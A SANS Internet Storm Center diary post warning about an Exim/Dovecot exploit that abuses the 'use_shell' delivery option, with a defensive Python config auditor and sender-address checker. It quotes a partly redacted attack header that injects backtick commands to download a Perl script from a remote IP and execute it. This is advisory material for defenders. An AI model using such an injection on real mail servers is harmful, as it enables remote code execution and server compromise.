
SANS ISC: InfoSec Handlers Diary Blog - SANS Internet Storm Center



Exim/Dovecot exploit making the rounds

Published: 2013-06-07
Last Updated: 2013-06-07 14:18:12 UTC
by Joel Esler (Version: 1)
2 comment(s)

One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit against his email server.  The exploit partially looked like this:

From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com

(Obviously edited for your safety, and I didn't post the whole thing.)

This is an exploit against Dovecot that turns the "use_shell" feature against itself: with that option set, the delivery command is handed to a shell rather than executed directly, so the backticks in the sender address above are evaluated.  This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration.  We'd caution anyone that is using Dovecot to take a look at their configuration and make sure they aren't using the "use_shell" parameter.  Or if you are, make darn sure you know what you are doing, and how to defend yourself.
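As an added illustration (not part of this diary), here is a small Python check a mail admin could run on their own config: it audits an Exim configuration for pipe transports that combine `use_shell` with expansion of message-derived data, and flags sender addresses carrying shell syntax like the one above. The configuration fragment is constructed for the example; the transport names and paths are assumptions, not taken from any real site.

```python
import re

# Constructed Exim configuration fragment (not from the diary): one transport written
# the way the example configs were, with use_shell, plus a hardened copy without it.
EXIM_CONF = """
begin transports

dovecot_delivery:
  driver = pipe
  command = /usr/lib/dovecot/deliver -d $local_part@$domain -f $sender_address
  use_shell
  user = vmail

dovecot_delivery_safe:
  driver = pipe
  command = /usr/lib/dovecot/deliver -d $local_part@$domain -f $sender_address
  user = vmail

remote_smtp:
  driver = smtp
"""

# Characters that only gain meaning when the command goes through /bin/sh; they
# essentially never appear in a legitimate sender address, so treat any hit as hostile.
SHELL_METACHARS = re.compile(r"[`$;|&<>(){}]")


def sender_has_shell_metachars(addr):
    """True if an envelope sender / From address carries shell command syntax."""
    return bool(SHELL_METACHARS.search(addr))


def parse_transports(conf_text):
    """Return {name: {option: value}} per transport block (minimal Exim parser).
    A bare boolean option such as `use_shell` is recorded as "true"."""
    transports, current = {}, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("begin "):
            continue
        if line.endswith(":") and not raw[0].isspace():   # unindented "name:" opens a block
            current = line[:-1]
            transports[current] = {}
        elif current is not None:
            key, _, value = line.partition("=")
            transports[current][key.strip()] = value.strip() or "true"
    return transports


def risky_transports(conf_text):
    """Pipe transports that run via a shell AND expand message data into the command."""
    return [name for name, opts in parse_transports(conf_text).items()
            if opts.get("driver") == "pipe"
            and opts.get("use_shell", "false") != "false"
            and "$" in opts.get("command", "")]
```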

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler
